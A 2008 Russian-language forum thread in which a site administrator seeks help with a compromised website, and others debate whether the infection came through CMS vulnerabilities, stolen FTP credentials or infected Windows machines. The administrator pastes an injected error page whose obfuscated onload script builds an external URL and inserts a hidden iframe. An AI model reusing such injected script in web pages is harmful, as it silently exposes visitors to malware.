Трабла(админю сайт)

пока не могу.....ftp закрыт на работе....к вечеру выложу

Хостинг HostFood.ru · **Хостинг HostFood.ru**

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

lexy · Непрочитанное сообщение **lexy** » 2008-04-17 7:45:49

zg писал(а): 90% вирусов лузет через винду, когда на сайт через фтп что-то заливается

выложи index.php

вирус-дроперы на сайт попадают обычно через дыры в CMS или скриптах(MySQL inject, register_globals в php.ini, корявки в правах на директории сайта, XSS). Было тут с месяцок назад на РБК на главной висел ))))))
Залить через FTP - только если специально.

Вообщем нашел я таки вот файлы типа 400.shtml
Со следующим содержимым

Код: Выделить всё

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);">
<H1>Bad Request</H1>
There was an error in your request.
<HR>
<I><!--#echo var="HTTP_HOST" --></I>
</BODY></HTML>

Видать хостера сломали....или ftp пароль угнали.
Я сижу под фрей, порты закрыты....так что никого не боюсЪ

lexy · Непрочитанное сообщение **lexy** » 2008-04-17 8:40:35

manefesto писал(а): Видать хостера сломали....или ftp пароль угнали.

ИМХО все-таки CMS с дыркой, меняй пасс, обновляй движок сайта

я понятия не имею как там и что обновлять....
Я только админю....картинки добавляю....редизигн маненько...

zg · Непрочитанное сообщение zg » 2008-04-18 10:33:57

lexy писал(а):Залить через FTP - только если специально.

не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнее

lexy · Непрочитанное сообщение **lexy** » 2008-04-18 16:02:15

zg писал(а):
lexy писал(а):Залить через FTP - только если специально.
не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнее

не исключаю вероятности, но через дыры не сложнее, особенно когда отчет о найденой уязвимости, и, возможно, и эксплоит, опубликован. Есть статистика, что более половины админов не следят за багтраком и не закрывают вовремя дыры. Бери, качай сплойт да троянь сайты )))))))

у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус..

где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))

а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.

zg · Непрочитанное сообщение zg » 2008-04-20 8:19:44

lexy писал(а):где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))

тутда их я заливал в cp1251... не кажется странным, что весь сайт в 1251, а два вирусных файла в UTF-8?

lexy писал(а):а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.

ты сайтами то видать не занимаешься, и не в курсе, что вирусы под винду пишут, так же как и фотошоп, поэтому дизайнеры сидят на винде, под которую уже давным давно написаны сотни тысяч вирусов. Любой взлом гораздо проще произвести если на целевую машину заслать вирус, чем колупаться в дырах, а потом узнать, что через них нифига не сделать. Далеко не каждая дыра даёт возможность записывать файлы на сервер.

Попробуй сломать сайт

это гораздо сложнее, чем подцепить вирус, который есть практически в любом кряке, порносайте, USB-флешке, локальной сети, письме счастья и т.д. и т.п.

lexy · Непрочитанное сообщение **lexy** » 2008-04-20 18:03:36

zg писал(а):ты сайтами то видать не занимаешься, и не в курсе, что вирусы под винду пишут,

отвечу тебе известным интернет-мемом: "на ЛОР быдло!"
сорри за бедность речи.
Ты по всей видимости ни тем ни другим толком не занимаешься. На сем дискуссию считаю закрытой

zg · Непрочитанное сообщение zg » 2008-04-20 20:16:54

lexy писал(а):Ты по всей видимости ни тем ни другим толком не занимаешься

да... куда уж нам

всё как-то бестолку получается

Непрочитанное сообщение **ADRE** » 2008-10-30 11:59:58

мда .... ставить надо скрипты все только на чтение пусть вирусы в темпах копашаться, да кстате в метном телекоме 2003 ftp сервак вынесли

половина городских сайтов заслала вирусов херову тучу всем

forum.lissyara.su

Трабла(админю сайт)

Re: Трабла(админю сайт)

Услуги хостинговой компании Host-Food.ru

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)

Re: Трабла(админю сайт)